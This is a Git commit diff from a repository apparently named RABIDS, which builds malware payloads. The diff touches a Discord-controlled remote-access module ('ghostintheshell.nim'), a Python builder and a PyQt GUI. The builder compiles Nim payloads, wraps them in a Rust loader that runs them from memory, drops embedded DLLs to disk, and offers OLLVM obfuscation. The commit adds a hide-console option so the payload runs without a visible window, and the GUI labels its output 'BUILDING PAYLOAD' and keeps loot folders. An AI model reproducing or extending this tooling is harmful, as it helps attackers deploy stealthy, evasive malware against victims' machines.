eliott/RABIDS
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Fixed DLL issue

Browse Source
This commit is contained in:
Sarwar 🧃
2025-09-07 19:33:54 +05:00
parent 812fa55c8d
commit a63c71f49b
4 changed files with 178 additions and 84 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
DLL/pcre64.dll Normal file
View File

Binary file not shown.

11
MODULE/ghostintheshell.nim
View File

@ -3,10 +3,6 @@ import dimscord, asyncdispatch, times, options, httpclient, osproc, os, strutils
const
discordToken = ""
creatorId = ""
cyrptoDllData = staticRead("../DLL/libcrypto-1_1-x64.dll")
sslDllData = staticRead("../DLL/libssl-1_1-x64.dll")
cyrptoDllName = "libcrypto-1_1-x64.dll"
sslDllName = "libssl-1_1-x64.dll"
let discord = newDiscordClient(discordToken)
var
@ -212,13 +208,6 @@ proc getHostname(): string =
var machineName = getEnv("MACHINE_NAME", getHostname())
proc onReady(s: Shard, r: Ready) {.event(discord).} =
when defined(windows):
if not fileExists(cyrptoDllName):
writeFile(cyrptoDllName, cyrptoDllData)
if not fileExists(sslDllName):
writeFile(sslDllName, sslDllData)
let dm = await discord.api.createUserDm(creatorId)
if machineName notin sessionRegistry:
sessionRegistry.add(machineName)

119
compiler.py
View File

@ -5,10 +5,11 @@ import sys
import os
import shutil
import re
import shlex
import shlex
import subprocess
import tempfile
def compile_nim(nim_file, output_exe, os_name, arch):
import base64
def compile_nim(nim_file, output_exe, os_name, arch, hide_console=False):
output_exe = Path(output_exe).resolve()
print(f"[*] Compiling Nim -> {os_name}:{arch}")
@ -24,6 +25,8 @@ def compile_nim(nim_file, output_exe, os_name, arch):
else:
nim_cmd.append("--os:windows")
nim_cmd.append(f"--cpu:{arch}")
if hide_console:
nim_cmd.append("--app:gui")
elif os_name == "linux":
nim_cmd.append("--os:linux")
@ -126,9 +129,8 @@ def merge_nim_modules(nim_files, out_dir: Path, options=None):
sys.exit(1)
print(f"[*] Merging modules: {nim_files}")
loot_dir = out_dir
loot_dir.mkdir(parents=True, exist_ok=True)
out_path = loot_dir / "combined.nim"
out_dir.mkdir(parents=True, exist_ok=True)
out_path = out_dir / "combined.nim"
merged_imports = set()
merged_code = []
@ -191,22 +193,28 @@ def merge_nim_modules(nim_files, out_dir: Path, options=None):
continue
final_code.append(merged_code[i])
with open(out_path, "w", encoding="utf-8") as fh:
fh.write("\n".join(sorted(merged_imports)))
fh.write("\n\n")
fh.write("\n".join(final_code))
fh.write("\n\n")
fh.write("proc main() =\n")
for main_content in main_contents:
if not main_content:
continue
fh.write(" block:\n")
for line in main_content:
fh.write(" " + line + "\n")
fh.write("\n")
fh.write("when isMainModule:\n")
fh.write(" main()\n")
final_content_parts = []
final_content_parts.append("\n".join(sorted(merged_imports)))
final_content_parts.append("\n\n")
final_content_parts.append("\n".join(final_code))
final_content_parts.append("\n\n")
final_content_parts.append("proc main() =\n")
for main_content in main_contents:
if not main_content:
continue
final_content_parts.append(" block:\n")
for line in main_content:
final_content_parts.append(" " + line + "\n")
final_content_parts.append("\n")
final_content_parts.append("when isMainModule:\n")
final_content_parts.append(" main()\n")
final_content = "".join(final_content_parts)
with open(out_path, "w", encoding="utf-8") as fh:
fh.write(final_content)
# print("[*] --- Begin Combined Nim Code ---\n" + final_content + "\n[*] --- End Combined Nim Code ---")
print(f"[+] Wrote merged Nim file: {out_path}")
return out_path
@ -229,7 +237,7 @@ def parse_target(target_str):
sys.exit(1)
def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=None, obfuscate=False, ollvm=None):
def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=None, obfuscate=False, ollvm=None, hide_console=False, embedded_dlls=None):
"""Generate a Rust wrapper for the Nim executable using in-memory execution."""
final_exe_path = Path(final_exe)
package_name = final_exe_path.stem
@ -260,14 +268,40 @@ def generate_rust_wrapper(nim_exe, final_exe, target_os, target_arch, embed_exe=
}
"""
windows_subsystem_attr = ""
if target_os == "windows" and hide_console:
windows_subsystem_attr = '#![windows_subsystem = "windows"]'
dll_declarations = ""
dll_drop_code = ""
if embedded_dlls:
dll_declarations_parts = []
dll_drop_code_parts = [" // Drop required DLLs to the current directory"]
for i, (dll_name, dll_bytes) in enumerate(embedded_dlls.items()):
dll_bytes_array = ','.join(str(b) for b in dll_bytes)
dll_declarations_parts.append(f'const DLL_{i}_NAME: &str = "{dll_name}";')
dll_declarations_parts.append(f'const DLL_{i}_DATA: &[u8] = &[{dll_bytes_array}];')
dll_drop_code_parts.append(f' std::fs::write(DLL_{i}_NAME, DLL_{i}_DATA).expect("Failed to write {dll_name}");')
dll_declarations = "\n".join(dll_declarations_parts)
dll_drop_code = "\n".join(dll_drop_code_parts)
rust_code = f'''
{windows_subsystem_attr}
use memexec;
use std::fs;
{embed_decl}
{dll_declarations}
const NIM_PAYLOAD: &[u8] = &[{nim_payload_array}];
fn main() {{
{embed_code}
{dll_drop_code}
unsafe {{
memexec::memexec_exe(NIM_PAYLOAD).expect("Failed to execute Nim payload from memory");
}}
@ -361,6 +395,7 @@ def main():
parser.add_argument("--nim-only", action="store_true", help="Only build Nim exe (no Rust)")
parser.add_argument("--obfuscate", action="store_true", help="Enable Rust OLLVM obfuscation")
parser.add_argument("--ollvm", nargs="*", help="OLLVM passes: bcfobf subobf constenc ...")
parser.add_argument("--hide-console", action="store_true", help="Hide console window on Windows")
parser.add_argument("--target", type=str, default="windows:amd64", help="Target triple (os:arch)")
parser.add_argument("--option", action="append", help="Option to inject as const (e.g., key=value)")
@ -375,6 +410,36 @@ def main():
target_os, target_arch = parse_target(args.target)
script_dir = Path(__file__).parent.resolve()
dll_source_dir = script_dir / 'DLL'
MODULE_DLLS = {
'MODULE/ctrlvamp.nim': {'pcre64DllData_b64': 'pcre64.dll'},
'MODULE/ghostintheshell.nim': {
'cryptoDllData_b64': 'libcrypto-1_1-x64.dll',
'sslDllData_b64': 'libssl-1_1-x64.dll'
}
}
selected_module_paths = args.merge if args.merge else [args.nim_file]
embedded_dlls_for_rust = {}
nim_options = list(args.option) if args.option else []
for module_path in selected_module_paths:
normalized_path = str(Path(module_path)).replace(os.sep, '/')
if normalized_path in MODULE_DLLS:
for const_name, dll_name in MODULE_DLLS[normalized_path].items():
dll_path = dll_source_dir / dll_name
if dll_path.exists():
dll_content = dll_path.read_bytes()
if not args.nim_only and target_os == 'windows':
print(f"[*] Queuing {dll_name} for Rust wrapper embedding.")
embedded_dlls_for_rust[dll_name] = dll_content
else:
print(f"[*] Embedding {dll_name} as base64 for {Path(module_path).name}")
b64_content = base64.b64encode(dll_content).decode('utf-8')
nim_options.append(f"{const_name}={b64_content}")
final_exe_path_str = args.output_exe
if target_os == "windows" and not final_exe_path_str.lower().endswith(".exe"):
final_exe_path_str += ".exe"
@ -386,15 +451,15 @@ def main():
with tempfile.TemporaryDirectory() as tmpdir:
tmp_dir = Path(tmpdir)
if args.merge:
loot_dir = final_exe.parent
launcher_source = merge_nim_modules(args.merge, loot_dir, options=args.option)
launcher_source = merge_nim_modules(args.merge, tmp_dir, options=nim_options)
else:
launcher_source = Path(args.nim_file)
patch_nim_file(launcher_source, args.option)
patch_nim_file(launcher_source, nim_options)
suffix = ".exe" if target_os == "windows" else ""
nim_exe_tmp = tmp_dir / f"{final_exe.stem}_nim_payload{suffix}"
compile_nim(launcher_source, nim_exe_tmp, target_os, target_arch)
should_hide_nim_console = args.hide_console and target_os == "windows"
compile_nim(launcher_source, nim_exe_tmp, target_os, target_arch, hide_console=should_hide_nim_console)
if not args.nim_only and target_os == 'windows':
print("[*] Generating Rust wrapper to embed Nim payload.")
@ -404,7 +469,9 @@ def main():
target_os, target_arch,
embed_exe=args.embed,
obfuscate=args.obfuscate,
ollvm=args.ollvm
ollvm=args.ollvm,
hide_console=args.hide_console,
embedded_dlls=embedded_dlls_for_rust
)
else:
if not args.nim_only and target_os != 'windows':

132
main.py
View File

@ -1,5 +1,6 @@
import sys
import os
from functools import partial
import shlex
import subprocess
from pathlib import Path
@ -7,7 +8,7 @@ import tempfile
from PyQt5.QtWidgets import (
QApplication, QMainWindow, QWidget, QVBoxLayout, QHBoxLayout,
QPushButton, QLineEdit, QComboBox, QCheckBox, QTextEdit, QLabel, QGroupBox,
QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView, QFileDialog, QListWidget, QScrollArea,
QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView, QFileDialog, QListWidget, QScrollArea, QAbstractItemView,
QListWidgetItem, QSizePolicy
)
from PyQt5.QtGui import QFont, QPixmap, QMovie
@ -107,6 +108,38 @@ class BuildThread(QThread):
self.finished_signal.emit(-1)
class ModuleTableWidget(QTableWidget):
"""A QTableWidget that supports drag-and-drop row reordering."""
reorder_signal = pyqtSignal(list)
def __init__(self, parent=None):
super().__init__(parent)
self.setDragDropMode(QAbstractItemView.InternalMove)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setSelectionMode(QAbstractItemView.SingleSelection)
def dropEvent(self, event):
if event.source() == self and (event.dropAction() == Qt.MoveAction or self.dragDropMode() == QAbstractItemView.InternalMove):
source_row = self.selectionModel().currentIndex().row()
dest_row = self.indexAt(event.pos()).row()
if dest_row == -1:
dest_row = self.rowCount() -1
current_order = []
for row in range(self.rowCount()):
item = self.item(row, 0)
if item and item.data(Qt.UserRole):
current_order.append(item.data(Qt.UserRole))
moved_item = current_order.pop(source_row)
current_order.insert(dest_row, moved_item)
self.reorder_signal.emit(current_order)
event.accept()
event.setDropAction(Qt.IgnoreAction)
else:
super().dropEvent(event)
class RABIDSGUI(QMainWindow):
def __init__(self):
super().__init__()
@ -212,14 +245,18 @@ class RABIDSGUI(QMainWindow):
left_layout.addWidget(self.module_options_group, stretch=7)
options_row1 = QHBoxLayout()
self.hide_console_check = QCheckBox("HIDE CONSOLE")
self.hide_console_check.setFont(subtitle_font)
self.hide_console_check.setChecked(True)
self.obfuscate_check = QCheckBox("OBFUSCATE")
self.obfuscate_check.setFont(subtitle_font)
self.obfuscate_check.setChecked(False)
self.obfuscate_check.stateChanged.connect(self.toggle_obfuscation)
self.ollvm_input = QLineEdit("")
self.ollvm_input.setFont(subtitle_font)
options_row1.addWidget(self.hide_console_check)
options_row1.addWidget(self.obfuscate_check)
options_row1.addWidget(self.ollvm_input)
options_row1.addWidget(self.ollvm_input, 1)
left_layout.addLayout(options_row1)
options_row2 = QHBoxLayout()
@ -235,7 +272,7 @@ class RABIDSGUI(QMainWindow):
self.target_os_combo = QComboBox()
self.target_os_combo.addItems(["windows", "linux", "macos"])
self.target_os_combo.setFont(subtitle_font)
self.target_os_combo.currentTextChanged.connect(self.update_obfuscation_for_os)
self.target_os_combo.currentTextChanged.connect(self.update_windows_only_options)
options_row2.addWidget(target_os_label)
options_row2.addWidget(self.target_os_combo, 1)
@ -286,11 +323,17 @@ class RABIDSGUI(QMainWindow):
self.module_combo.currentTextChanged.connect(self.update_module_description)
self.module_combo.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
module_select_layout.addWidget(self.module_combo)
module_buttons_layout = QHBoxLayout()
self.add_module_btn = QPushButton("ADD MODULE")
self.add_module_btn.setFont(subtitle_font)
self.add_module_btn.clicked.connect(self.add_module)
self.add_module_btn.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
module_select_layout.addWidget(self.add_module_btn)
module_buttons_layout.addWidget(self.add_module_btn)
self.show_all_options_btn = QPushButton("SHOW ALL OPTIONS")
self.show_all_options_btn.setFont(subtitle_font)
self.show_all_options_btn.clicked.connect(self.show_all_options)
module_buttons_layout.addWidget(self.show_all_options_btn)
module_select_layout.addLayout(module_buttons_layout)
right_layout.addLayout(module_select_layout)
self.module_desc_label = QLabel("Select a module to view its description")
self.module_desc_label.setFont(subtitle_font)
@ -303,17 +346,16 @@ class RABIDSGUI(QMainWindow):
module_chain_label = QLabel("MODULE CHAIN")
module_chain_label.setFont(title_font)
right_layout.addWidget(module_chain_label)
self.module_table = QTableWidget()
self.module_table = ModuleTableWidget()
self.module_table.setFont(subtitle_font)
self.module_table.setColumnCount(4)
self.module_table.setHorizontalHeaderLabels(["Module", "", "", ""])
self.module_table.setColumnCount(2)
self.module_table.setHorizontalHeaderLabels(["Module", ""])
self.module_table.horizontalHeader().setSectionResizeMode(0, QHeaderView.Stretch)
self.module_table.setColumnWidth(1, 50)
self.module_table.setColumnWidth(2, 50)
self.module_table.setColumnWidth(3, 50)
self.module_table.setStyleSheet("background-color: #111113;")
self.module_table.cellClicked.connect(self.on_module_clicked)
self.module_table.reorder_signal.connect(self.reorder_modules)
right_layout.addWidget(self.module_table)
self.module_table.itemClicked.connect(self.on_module_item_clicked)
builder_layout.addLayout(right_layout, 4)
@ -569,9 +611,9 @@ class RABIDSGUI(QMainWindow):
self.tab_widget.addTab(docs_widget, "DOCUMENTATION")
self.update_loot_folder_view()
self.update_module_description("SELECT MODULE")
self.update_module_table()
self.update_module_table()
self.update_options_layout()
self.update_obfuscation_for_os(self.target_os_combo.currentText())
self.update_windows_only_options(self.target_os_combo.currentText())
def on_tab_changed(self, index):
if self.tab_widget.tabText(index) == "OUTPUT":
@ -723,55 +765,45 @@ class RABIDSGUI(QMainWindow):
self.update_module_table()
self.update_options_layout()
def remove_module(self, row):
if 0 <= row < len(self.selected_modules):
module_name = os.path.basename(self.selected_modules[row])
self.selected_modules.pop(row)
self.log_message(f"Removed module: {module_name}", "success")
def remove_module(self, module_to_remove):
"""Removes a module from the selected_modules list by its full path."""
if module_to_remove in self.selected_modules:
self.selected_modules.remove(module_to_remove)
module_name = os.path.basename(module_to_remove)
self.log_message(f"Removed module: {module_name}", "system")
self.update_module_table()
self.update_options_layout()
def on_module_clicked(self, row, column):
if 0 <= row < len(self.selected_modules):
self.update_options_layout()
def show_all_options(self):
"""Updates the options view to show options for all selected modules."""
self.update_options_layout()
def move_module_up(self, row):
if row > 0:
self.selected_modules[row], self.selected_modules[row - 1] = self.selected_modules[row - 1], self.selected_modules[row]
self.update_module_table()
self.update_options_layout()
def move_module_down(self, row):
if row < len(self.selected_modules) - 1:
self.selected_modules[row], self.selected_modules[row + 1] = self.selected_modules[row + 1], self.selected_modules[row]
self.update_module_table()
self.update_options_layout()
def on_module_item_clicked(self, item):
"""When a module in the chain is clicked, show its specific options."""
self.update_options_layout(focused_module=item.data(Qt.UserRole))
def reorder_modules(self, new_order):
# This check prevents re-updating if the order hasn't actually changed.
if self.selected_modules == new_order:
return
self.log_message("Module chain reordered.", "system")
self.selected_modules = new_order
self.update_module_table() # Re-draw to fix button connections
def update_module_table(self):
self.module_table.setRowCount(len(self.selected_modules))
for i, module in enumerate(self.selected_modules):
module_name = module.split('/')[-1]
name_item = QTableWidgetItem(module_name)
name_item.setFont(QFont("Arial", 10))
name_item.setData(Qt.UserRole, module) # Store full module path
name_item.setTextAlignment(Qt.AlignLeft | Qt.AlignVCenter)
self.module_table.setItem(i, 0, name_item)
up_btn = QPushButton("")
up_btn.setFont(QFont("Arial", 8))
up_btn.clicked.connect(lambda _, r=i: self.move_module_up(r))
up_btn.setEnabled(i > 0)
self.module_table.setCellWidget(i, 1, up_btn)
down_btn = QPushButton("")
down_btn.setFont(QFont("Arial", 8))
down_btn.clicked.connect(lambda _, r=i: self.move_module_down(r))
down_btn.setEnabled(i < len(self.selected_modules) - 1)
self.module_table.setCellWidget(i, 2, down_btn)
remove_btn = QPushButton("X")
remove_btn.setFont(QFont("Arial", 8))
remove_btn.clicked.connect(lambda _, r=i: self.remove_module(r))
self.module_table.setCellWidget(i, 3, remove_btn)
remove_btn.clicked.connect(partial(self.remove_module, module))
self.module_table.setCellWidget(i, 1, remove_btn)
for i in range(self.module_table.rowCount()):
self.module_table.setRowHeight(i, 30)
@ -779,15 +811,18 @@ class RABIDSGUI(QMainWindow):
def toggle_obfuscation(self):
self.ollvm_input.setEnabled(self.obfuscate_check.isChecked())
def update_obfuscation_for_os(self, os_name):
def update_windows_only_options(self, os_name):
if os_name in ("linux", "macos"):
self.hide_console_check.setEnabled(False)
self.obfuscate_check.setEnabled(False)
self.obfuscate_check.setChecked(False)
self.ollvm_input.setEnabled(False)
else:
self.hide_console_check.setEnabled(True)
self.obfuscate_check.setEnabled(True)
self.toggle_obfuscation()
def show_loading_view(self):
for i in reversed(range(self.options_layout.count())):
layout_item = self.options_layout.itemAt(i)
@ -932,6 +967,9 @@ class RABIDSGUI(QMainWindow):
if self.ollvm_input.text():
cmd.extend(["--ollvm"] + self.ollvm_input.text().split())
if self.hide_console_check.isChecked() and self.target_os_combo.currentText() == "windows":
cmd.append("--hide-console")
cmd.extend(options)
self.module_options_group.setTitle("BUILDING PAYLOAD...")
self.show_loading_view()